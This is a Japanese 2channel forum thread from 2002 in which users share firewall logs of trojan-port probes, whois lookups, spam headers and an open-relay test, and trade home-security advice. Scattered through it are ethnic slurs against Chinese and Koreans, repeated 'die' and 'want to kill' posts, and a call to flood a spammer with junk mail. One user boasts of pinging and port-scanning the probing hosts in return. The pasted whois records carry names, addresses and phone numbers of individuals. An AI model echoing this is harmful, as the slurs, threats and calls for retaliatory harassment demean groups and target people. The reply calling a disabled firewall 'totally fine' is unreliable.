インドは半島、中に次いでしぶとい。
スキル高い人が多いようだし。

こいつをやっつける方法はないものだろうか。
[ 211.0.9.241 ］のJPNICからの応答は以下の通りです。
オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-K73 [サブアロケーション] 211.0.9.0
株式会社ウェブゲイツ (Web Gates Internet Service)
WEBGATES-NET [211.0.9.240 <-> 211.0.9.255] 211.0.9.240/28

From: [email protected] < [email protected] >
To: [email protected]
Subject:Download your 50% Hotel Discount Card by 2/25/02
Date***
Received: from [205.244.70.27] by yahoo.com with ESMTP id **
Received: from mail1 (216.242.35.202) by mail9.sock2002.com
(LSMTP for Windows NT v1.1b) with SMTP id < [email protected] >
From [email protected]
-----
Dear Valued Friend,
Great news! Your new 50% Hotel Discount Card is ready to be downloaded!
It's a Special Reward... and one of the most valuable downloads on the Internet today!
You get all this:
50% off the regular room rates at over 5,000 popular Hotels including participating Holiday Inn,
Hyatt, Ramada, Days Inn properties and many more!
PLUS you'll enjoy...
24-Hour Road & Tow Protection Nationwide
Up to $500.00 Airline Discounts
Up to 30% off Car Rentals
Only available to residents of the U.S., Puerto Rico and the U.S. Virgin Islands. Travel Values Plus is
owned and operated by webloyalty.com. All trademarks and or copyrights are the property of
their respective owners, and unless otherwise noted, Travel Values Plus is not affiliated
with the respective owners. Gas benefit not available for gasoline purchases
made in New Jersey.2001, Travel Values Plus
This email is not sent unsolicited. This is an Opt in Network mailing!
This message is sent to subscribers ONLY.
The e-mail subscription address is: [email protected]
To unsubscribe please click here. or
Send an email with remove as the subject to [email protected]

65.96.65.80

pony.opthome.com (pri=10)
<220 pony.opthome.com Greetings from Crude Perl MailServer
>HELO rlytest.nanet.co.jp
<250 pony.opthome.com HELO Accepted, how you doin'?
>MAIL FROM:< [email protected] >
<250 message accepted from 216.242.35.202 at pony.opthome.com
>RCPT TO:<[email protected]>
<250 Accepted for mailbox rlytest at nanet.co.jp
>QUIT
<221 pony.opthome.com Shutting down connection
問題あり：不正な中継を受け付けます。
(208.26.68.197)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

インターネットに接続するとすぐにトロイの木馬を仕掛けられてきて
本当に困っています。いくサイトは最近は本当に偏っていて
ほとんど陸上関係だけです。
１：５３（２００２／２／２１）に次の通信を検出しました。
プロトコル：ＴＣＰ（インバウンド）
リモートアドレス：２４．１６８．３０．１３：４６８８
ローカルアドレス：oemcomputer(61.207.140.99)２７３７４
リモートコンピュータ（２４．１６８．３０．１３）がリモートアクセスの
トロイの木馬によってこのコンピュータの通常使うポートに対する接続を試行しました。
試行は遮断されました。

３：５５に次の通信を検出しました。
プロコリル：ＴＣＰ（インバウンド）
リモートアドレス：６５．９６．６５．８０．２５６１
ローカルアドレス：ｏｅｍｃｏｍｐｕｔｅｒ（６１．２０７．１４０．３１）２７３７４
リモートコンピュータ（６５．９６．６５．８０）がリモートアクセスのトロイの木馬によって
このコンピュータの通常使うポートに対する接続を試行しました。
試行は遮断されました。

↑
ネットに接続するとすぐにトロイの木馬を仕掛けられて本当に怖いです。
いつもいってるサイトの関係者なのかな・・・
トロイの木馬って簡単に仕掛けられるんでしょうか。

トロイが飛んできてると本気で思ってるのか？
このスレ笑わすな

>>572
ぷぷっしかも自分のIPアドも晒してる（核爆笑

>>574
ﾌﾟﾌﾟＩＰが永久的に同じと思うなよ（ｗ

>>574
DQN

[email protected]
こいつうざすぎ〜
匿名ジャンクメールを大量に送信してやっつけるのに協力してください。

>577
理由無く、荒らし依頼のおまえがウザイが

>>575 >>576
じゃあお前らはなんでここに晒すんだ？
意味のないことしかできない低レベルちんかす野郎は
初級でやりなおせ

掲示板荒らされた場合、どうやって相手のパソコン打った場所特定できますか？

くだらねぇ質問へ逝け > 580

>>579
お前がルールブックか？
今すぐしねや

>>579
調子乗ってんじゃねーぞｺﾗ（ｗ

死ね。

　

>>583
ちょーし のらないでネ

I need product key ID for office 2000 us. GIVE to ME!

Korea Network Information Center マジ死ね！DQNチョンの飼い主！

You cann't even spell right... There is no reason for you to alive... DIE!

inetnum: 202.129.0.0 - 202.129.31.255
netname: CAT
descr: Communication Authority of Thailand, CAT
descr: International Telecommunications Service Provider
country: TH
admin-c: TK38-AP
tech-c: SK79-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-TH-THIX-CAT
changed: [email protected] 20000914
source: APNIC

person: Tanussit Klaimongkol
address: Data Comm. Dept.(Internet)
address: CAT Bangkok 10501
address: Thailand
country: TH
phone: +66-2-2374300
fax-no: +66-2-5063186
e-mail: [email protected]
nic-hdl: TK38-AP
mnt-by: MAINT-TH-THIX-CAT
changed: [email protected] 20000215
source: APNIC

person: Serthsiri Khantawisoote
address: Data Communication Department, CAT
address: Bangkok 10501
country: TH
phone: +66-2-237-4300
fax-no: +66-2-506-3186
e-mail: [email protected]
nic-hdl: SK79-AP
mnt-by: MAINT-TH-THIX-CAT
changed: [email protected] 20000320
source: APNIC

ウザイの。

自分にも来ました。

リモートアクセス・ポートスキャンもう万々行いました。

お返しにピンたっぷり撃っときました。（ﾌﾌ･･･｡

５８０へ

CGIって知っている？

確かそれを書き込みが出来うるレベルだと特定のIPを遮断できたり、来場者のIPを知る事が出来るよ。

多分どこかでみていると思うけど、
貴方のIPは○○ですねって奴。
あれの事。遮断はそれの応用。

これ以上の質問は自分で勉強しなさーい

難しいと思うから、パス付きが一番実用と思われ。
それとあの輩はパス付きに目がいきやすいから、多少なりとも攻撃は減少すると思うよ。
最後にインターネットの匿名性があるからゆえに攻撃が頻繁になる。
IPやアクセスポイントを晒されると、青い顔になる人は大勢いると思う。
対策を考えるよりも先に、どうしたら一番荒らし者が困るかと考えるのが近道と思われ。

http://www.mse.co.jp/ip_domain/user_script.shtml

210.227.23.99

218.43.43.229

ルーターのパスワードﾃﾞﾌｫﾙﾄにしといたら、設定書き換えられてた。

ポートあけられてたような気がする。

61.217.227.26
バックドアサブセブンとかでてノートン先生のファイアー
ウォールが防ぎました。
これってどうすればいいですか？！
最新のウイルス定義で全ドライブウイルスチェックしたんですが
なにもでてこないんです・・。
誰か助けて下さい（TT

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.203.0.0-61.203.127.0
b. [ネットワーク名] BIGLOBE-2
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [運用責任者] TN265JP
n. [技術連絡担当者] NK032JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/03/22
[返却年月日]
[最終更新] 2001/06/21 16:13:00 (JST)
[email protected]

>>596
出てこなくてOKです。トロイの木馬にあらかじめ感染しているPCを探りに
来てるだけですから。

ＩＰアドレスを隠すには、どうしたら良いですか？すみません。厨房で。

本日2/23・23:00より祭り開催決定！
特に迷惑メールにうんざりしている方、どんどん参加してね！

【祭】迷惑メール撲滅活動推進委員会発足【祭】
http://cheese.2ch.net/test/read.cgi/phs/1013258545/l50

何か急にスパムメール来る様になってない？
http://cheese.2ch.net/test/read.cgi/phs/1014383780/l50

[email protected]
From:USA Gold Card< [email protected] >
To: [email protected]
Subject:Get Approved for an Unsecured Gold Credit Card Instantly
Online!
Date***
Received: from [65.118.67.251] by pony.opthome.com with ESMTP id ***
Received: from listserv (65.118.67.242) by lsmail3.vertcoms.com (LSMTP for Windows NT v1.1b) with SMTPid< [email protected] >
From [email protected]
-----
This email is not sent unsolicited. This is an Opt in Network mailing!
This message is sent to subscribers ONLY.

The e-mail subscription address is: [email protected]
To unsubscribe please click here. or
Send an email with remove as the subject to [email protected]
-----
mail.vertcoms.com (pri=10)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
--------------------------------------------------------------------------------
qmail.opthome.com (pri=10)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
--------------------------------------------------------------------------------
pony.opthome.com (pri=10)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
-------------------------------------------------------------------------------
qmail1.optmails.com (pri=10)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。

210.54.197.8　

24.185.24.222
61.83.53.7
61.139.136.168
202.112.23.38
61.81.161.2
61.16.30.213
61.186.183.76
202.138.165.179
208.50.157.183
133.160.191.6
208.50.157.183
213.76.220.246

今日の成果
ウザイったらありゃしない

ココから何度も攻撃されました
213.98.203.195,1858

>>604

213.98.203.195

・・・って go.jp ?

213-98-203-195.uc.nombres.ttd.es
スペインじゃ？

コレってプロクシなんですか？

日付: 02/02/23 時刻: 17:27:44
規則「Default Block Backdoor/SubSeven Trojan」が computer-i1,27374 をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは computer-i1,27374
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 64.208.194.218,1901
ﾌﾟﾛｾｽ名は N/A

こいつウザすぎ。

下記ＩＰから攻撃されたひといますか？

61.147.16.2

しつこい・・・

133.45.154.182

inetnum: 61.147.0.0 - 61.147.255.255
netname: CHINANET-JS
descr: CHINANET Jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: PL103-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-JS
changed: [email protected] 20010213
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: Pearl Lynn
address: No.268,Hanzhong Road,Nanjing 210029
country: CN
phone: +86-25-6588783
fax-no: +86-25-6588740
e-mail: [email protected]
nic-hdl: PL103-AP
mnt-by: MAINT-CHINANET-JS
changed: [email protected] 20020129
source: APNIC

218.130.136.31

国内では、zaq.net ドメインからが多いな。

↑ 訂正 zaq.net → zaq.ne.jp スマソ

ｱﾄﾞﾚｽ 200.171.30.165 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
>>598
こーゆうログが出たうちのＰＣもトロイに感染してるってことでしょうか・・

>>615
違うって。ある種のトロイは外部からのアクセスを受けるために特定のポート
を空ける。FWはそのポートに外部からアクセスがきた場合に警告を出す。
（トロイに感染してるかは関係なし）なんで、ノートンとか入れててウィルス
チェックが万全ならば、なんにも心配する必要なし。

>>616
それを聞いて安心しました。
最近頻繁に同じ検出されるんで・・・・。
ちなみに今さっきも同じものが203.168.240.76から来ました。
ネットゲームしてる時とかＦＷ切ってるんですけど、大丈夫なんでしょうか？？

211.181.127.141

>>617
＞ネットゲームしてる時とかＦＷ切ってるんですけど、大丈夫なんでしょうか？？
ぜ〜んぜん平気。

619の言う事は
嘘だよ。信じるな。

210.197.75.215

210.250.148.140

203.141.151.218
>>ALL P-80
静かだ・・・。静かすぎる接近だった・・・。
現在の被害状況不明です。

>>620
なんか何でも平気みたいな書き方してましたね。トロイに関してはってことで
よろしく。

218.130.136.64

61.118.45.117

218.140.178.142

最後に受けた攻撃：　2002/02/24 13:50:26
最近の不正侵入試行　3
最近の攻撃元：　1
最も頻度の高い攻撃元： 211.198.196.18

ﾁｮｿｳｾﾞｪ

203.218.181.63
三回も不正侵入試行があったよ、やはりルーターを入れてノートンと
併用するか、コレガ社のルーターが一番？

毎日、トロイに攻撃されているようなのですが、
何かオススメの対策などありますでしょうか？

Date: 2002/02/24 Time: 15:45:48
Rule "Default Block Backdoor/SubSeven Trojan" blocked (XX.XXX.XXX.XXX,XXXXX). Details:
Inbound TCP connection
Local address,service is (XX.XXX.XXX.XXX,XXXXX)
Remote address,service is (24.161.54.95,4507)
Process name is "N/A"

最後に受けた攻撃：　2002/02/24 18:24:47
最近の不正侵入試行　14
最近の攻撃元：　4
最も頻度の高い攻撃元： 211.211.2.156

ﾁｮｿｳｾﾞｪ 殺してぇ

日付: 2002/02/24 時刻: 18:46:59
ｱﾄﾞﾚｽ 66.25.125.43 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

ROADRUNNER-SOUTHWEST (NETBLK-ROADRUNNER-SOUTHWEST)
13241 Woodland Park Road
Herndon, VA 20171
US

Netname: ROADRUNNER-SOUTHWEST
Netblock: 66.25.0.0 - 66.25.255.255
Maintainer: RRSW

Coordinator:
ServiceCo LLC (ZS30-ARIN) [email protected]
1-703-345-3416

Domain System inverse mapping provided by:

DNS1.RR.COM 24.30.200.3
DNS2.RR.COM 24.30.201.3
DNS3.RR.COM 24.30.199.7
DNS4.RR.COM 65.24.0.172

ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

Record last updated on 14-Jun-2001.
Database last updated on 23-Feb-2002 19:56:39 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

２ｃｈ見てると支那と半島からのブロックされるアクセスがやたら多い。他のＨＰじゃそんな事ないのに・・・。

Trying whois -h whois.apnic.net 61.157.87.249
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)
inetnum: 61.157.0.0 - 61.157.255.255
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: XS16-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-SC
changed: [email protected] 20000701
source: APNIC
person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC
person: Xiaodong Shi
address: No.72,Wen Miao Qian Str.
address: Data Communication Bureau Of Sichuan Province
address: Chengdu
address: PR China
country: CN
phone: +86-28-6130055
fax-no: +86-28-6151287
e-mail: [email protected]
nic-hdl: XS16-AP
mnt-by: MAINT-CHINANET-SC
changed: [email protected] 19990811
source: APNIC

Domain Handle: 233463
Domain Name: 117mail.com
Created On: 01-Dec-2001 01:57:46
Last Updated On: 16-Jan-2002 10:54:28
Expiration Date: 30-Nov-2003 16:57:46
Status: ACTIVE
Registrant Handle: None
Registrant Name: takuya kida
Registrant Organization: takuya kida
Registrant Street1: ohkubo
Registrant Street2: None
Registrant City: shinjuku-ku
Registrant State: tokyo
Registrant Postal Code: 160-0064
Registrant Country: JP
Registrant Phone: None
Registrant Fax: None
Registrant Email: None
Admin Handle: 152259
Admin Name: takuya kida
Admin Organization: takuya kida
Admin Street1: ohkubo
Admin Street2:
Admin City: shinjuku-ku
Admin State: tokyo
Admin Postal Code: 160-0064
Admin Country: JP
Admin Phone: 03-3366-4330
Admin Fax:
Admin Email: [email protected]
Billing Handle: 152259
Billing Name: takuya kida
Billing Organization: takuya kida
Billing Street1: ohkubo
Billing Street2:
Billing City: shinjuku-ku
Billing State: tokyo
Billing Postal Code: 160-0064
Billing Country: JP
Billing Phone: 03-3366-4330
Billing Fax:
Billing Email: [email protected]
Tech Handle:
Tech Name: takuya kida
Tech Organization: takuya kida
Tech Street1: ohkubo
Tech Street2:
Tech City: shinjuku-ku
Tech State: tokyo
Tech Postal Code: 160-0064
Tech Country: JP
Tech Phone: 03-3366-4330
Tech Fax:
Tech Email: [email protected]
Name Server: ns078.apoapo.com
Name Server: NS999.TMN.TO

Trying whois -h whois.apnic.net 61.132.69.111

inetnum: 61.132.0.0 - 61.132.127.255
netname: CHINANET-JS
descr: CHINANET Jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: PL103-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-JS
changed: [email protected] 20010213
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: Pearl Lynn
address: No.268,Hanzhong Road,Nanjing 210029
country: CN
phone: +86-25-6588783
fax-no: +86-25-6588740
e-mail: [email protected]
nic-hdl: PL103-AP
mnt-by: MAINT-CHINANET-JS
changed: [email protected] 20020129
source: APNIC

Trying whois -h whois.apnic.net 61.186.67.7

inetnum: 61.186.64.0 - 61.186.127.255
netname: CHINANET-HN
descr: CHINANET hunan province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: YX69-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-HN
changed: [email protected] 20010528
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

Trying whois -h whois.apnic.net 61.186.67.7

inetnum: 61.186.64.0 - 61.186.127.255
netname: CHINANET-HN
descr: CHINANET hunan province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: YX69-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-HN
changed: [email protected] 20010528
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: Yali Xiao
address: Hunan Data Communication Bureau No.9 middle wuyi road ChangSha city,Hunan ,P.R.China 410011
country: CN
phone: +86-731-2260079
fax-no: +86-731-2265549
e-mail: [email protected]
nic-hdl: YX69-AP
mnt-by: MAINT-CHINANET-HUNAN
changed: [email protected] 20010523
source: APNIC

Trying whois -h whois.apnic.net 218.63.74.225

inetnum: 218.62.128.0 - 218.63.255.255
netname: CHINANET-YN
descr: CHINANET yunnan province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: ZL48-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-YN
changed: [email protected] 20010711
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: zhiyong liu
address: 136 beijin roadkunmingchina
country: CN
phone: +86-871-3536495
fax-no: +86-871-3536997
e-mail: [email protected]
nic-hdl: ZL48-AP
mnt-by: MAINT-CHINANET-YN
changed: [email protected] 19990624
source: APNIC

Trying whois -h whois.apnic.net 61.186.8.4

inetnum: 61.186.0.0 - 61.186.63.255
netname: CHINANET-HI
descr: CHINANET Hainan province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: LZ8-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CN-CHINANET-HI
changed: [email protected] 20010307
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: liuqing zheng
address: HAINAN DATA COMMUNICATION BUREAU
address: HaiXiu road NO.46
address: HaiKou HaiNan province CHINA
country: CN
phone: +86-898-6769607
fax-no: +86-898-6769427
e-mail: [email protected]
nic-hdl: LZ8-AP
mnt-by: MAINT-CN-CHINANET-HI
changed: [email protected] 20010122
source: APNIC

61.214.93.15
210.194.69.100

支那人と半島人のアクセス多すぎ・・・。小心者の漏れは毎回ドキドキ。

218.13.90.211
61.156.60.193
61.74.246.121
61.195.94.127
61.174.87.15
61.43.205.135
61.182.245.236
61.182.255.198
61.182.251.195

>>3
（　´_ゝ`）絶対跳ね返すとは限らないかも、なんかしらんけど検索されてもひっかからないウイルスがあるらしい（おそらくデマじゃろう）

61.178.103.31

210.194.69.100←マジウザイ。106発目だよ。

>>639 644
Trying whois -h whois.apnic.net 210.194.69.100

inetnum: 210.194.0.0 - 210.194.255.255
netname: ATHOME-JP
descr: @Home Network Japan
country: JP
admin-c: AJNO1-AP
tech-c: AIM2-AP
remarks: For abuse issues, please email [email protected]
mnt-by: APNIC-HM
mnt-lower: MAINT-JP-ATHOME
changed: [email protected] 20010112
changed: [email protected] 20010511
source: APNIC

role: ATHOME IP MGMT
address: @Home Japan
address: 4-7-1, Aobadai,Meguro-ku
address: Tokyo,Japan,153-0042
country: JP
phone: +81-3-5452-3820
fax-no: +81-3-5452-3821
e-mail: [email protected]
admin-c: KS197-AP
tech-c: KS197-AP
nic-hdl: AIM2-AP
remarks: for abuse issues, please email [email protected]
mnt-by: MAINT-JP-ATHOME
changed: [email protected] 20020121
source: APNIC

61.77.227.59

ネット繋いだとたん4箇所から秒単位で。揃って6699とは…。

-61,125,74,223:6699
a. [IPネットワークアドレス] 61.125.64.0-61.125.110.0
b. [ネットワーク名] JCOM-NET
f. [組織名] 株式会社ジェイコム関西

-61.213.139.43:6699
a. [IPネットワークアドレス] 61.213.139.0
b. [ネットワーク名] DS-NETWORKS
f. [組織名] 株式会社ディーエスネットワークス

-210.20.148.53:6699
inetnum: 210.20.148.0 - 210.20.151.255
netname: ATHOME-JP-NRIMA-8
descr: ATHOME-JP

-217.226.114.48:6699
Netname: 217-RIPE
Netblock: 217.0.0.0 - 217.255.255.255
Maintainer: RIPE

MXやっとらんつーに、誰か頃して下さい。

>>647
ついでにping,ftp,telnetとか全く通らんし
夜は利用者少ないから繋ぎ直してもIP変わらんし欝だ

211.18.219.92

[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

XePhion(株式会社エヌ・ティ・ティ エムイー) (XePhion(NTT-ME Corporation))
SUBA-337-041 [サブアロケーション] 61.205.192.0-61.205.207.0
有限会社ブロードバンド (Brord band Corporation)
F-PARADISE [61.205.200.128 <-> 61.205.200.143] 61.205.200.128/28

>>619
ﾊｧ？ネタですか？
NetBIOSが動作してるかもしれないだろ？
TCP/IPの実装にセキュリティーホールがあんだろ？
厨房のホームページ1行読んだぐらいの知識だろうから
>ぜ〜んぜん平気。
と言えるんだろうな。オナニーは結構だか大嘘書いて迷惑だけはかけるな
FW常駐させるかルータ置くかなど対策を取らないとウイルスを送り込める

210.238.166.101 DION
常時接続で1日10回はBlackICEが反応する。
ポート80と111人気あるな。

ポートスキャンかけたら自分のIPで反応しる！

＞＞651
実際に送込まれた被害者か?(藁

以下の方々が SubSevenトロイを探しに来てたようです
211.205.118.10
24.168.30.13
213.169.160.93
62.31.80.108
211.207.214.160

支那と朝鮮のうざいアクセスを弾けないよー（涙

またport80かよ!うちはweb鯖立ててないってんだよ!
あっちこっちから来るがDNSの設定ミスか??
てことでport80への接続の失敗はログしないようにした

>>651
FW常駐しとけば絶対安心できますか？

アンチウイルスソフトとファイヤーウォールソフトを常駐させておけばひとまず安心です。
しかし、これらに設定の不備やセキュリティーホールが存在する可能性があるので残念ながら絶対安心とは言えません。
例えば、ファイヤーウォールで送受信を許可したアプリケーションや許可したポートを使用するアプリケーションに
セキュリティーホールが存在する可能性なども考えられます。
Windowsのユーザーさんの中で、Microsoft ネットワーク共有サービス（NetBIOS）を使用しない方は
ネットワークの設定から Microsoftネットワーク共有サービス のコンポーネントを削除してください
インターネット上から共有しているファイルやフォルダが閲覧、書換、削除、される危険性があります。
共有していなくてもクラッカーの侵入が成功したときの足がかりになる恐れがあります。
また、LANを使用していないダイアルアップのユーザーさんは Microsoft ネットワーク クライアント の
コンポーネントを削除することでMACアドレスやワークグープ名、コンピューター名などが
インターネット上から容易に参照されにくくなりセキュリティーが高まります。
そして、アンチウイルス製品の定義ファイル（パッチ）は頻繁に更新して最新のものを使用する事が重要です。

しかし、
あまりにセキュリティーを強化すると多くのクラッカーが挫折してしまい、わずかながらネットワークセキュリティや
コンピュータウイルス対策の技術発展が頓挫するかもしれません。

先週1週間の注目アタック

0-1pool107-140.nas9.miami1.fl.us.da.qwest.net サブネット内のホスト探し
dsl092-042-200.lax1.dsl.speakeasy.net フィンガープリントしてポート111つつく
61.236.50.251 SynFlood 571回 ソースIPアドレス改竄

時間差で BackOrificeトロイ を複数回探しに来た同じMACアドレスの方
24-168-30-91.nyc.rr.com
24-168-29-12.nyc.rr.com
24-168-30-201.nyc.rr.com

なんつって〜

211.18.119.25

61.77.227.59

216.34.209.1

211.128.0.29

これはなに？

>>665 暇だったんで。
クリティカルパス・パシフィック株式会社（NTT関連会社）
法人を対象に電子メールのアウトソーシング事業を展開し
ている会社らしいっす。
不正アクセスなら鯖管に対処してもらうべし。
実際に深刻な被害があれば損害賠償まで、じゅるじゅる…
ユルユルな鯖管さん、気をつけようね〜。（本心は市ね）

210.254.137.23

>>651
あのさ、それは至極同意なんだ。出来れば>>622読んでレスしてくれ。

206.3.4.150

>>668
たぶん>>622も読んだ上で書いてるんだと思う。

というか…>>651は最近になってセキュリティに凝りだした人なんでしょう。
私も以前は>>651のような考え方をしていました。でも最近では
「ぜ〜んぜん平気…ただし俺は。」と思うようになりました。
ようするに平気かどうかはその人のポリシーによるんであって、一般的に
「安全か危険か」というと重箱の隅をつつけば危険はいくらでも作り出せるんです。
たとえば「道を歩いていてマンホールに落ちたときだけ適用される保険」
があったとして、それに加入する必要があるかどうかは個人のポリシー次第なわけで
一方で「入らなくても全然平気」と言う人がいたら、それに対して、
「目が不自由な人かもしれんだろ」とか「上見てて落ちるかもしれんだろ」
などといくらでも危険の可能性を指摘することは出来るのです。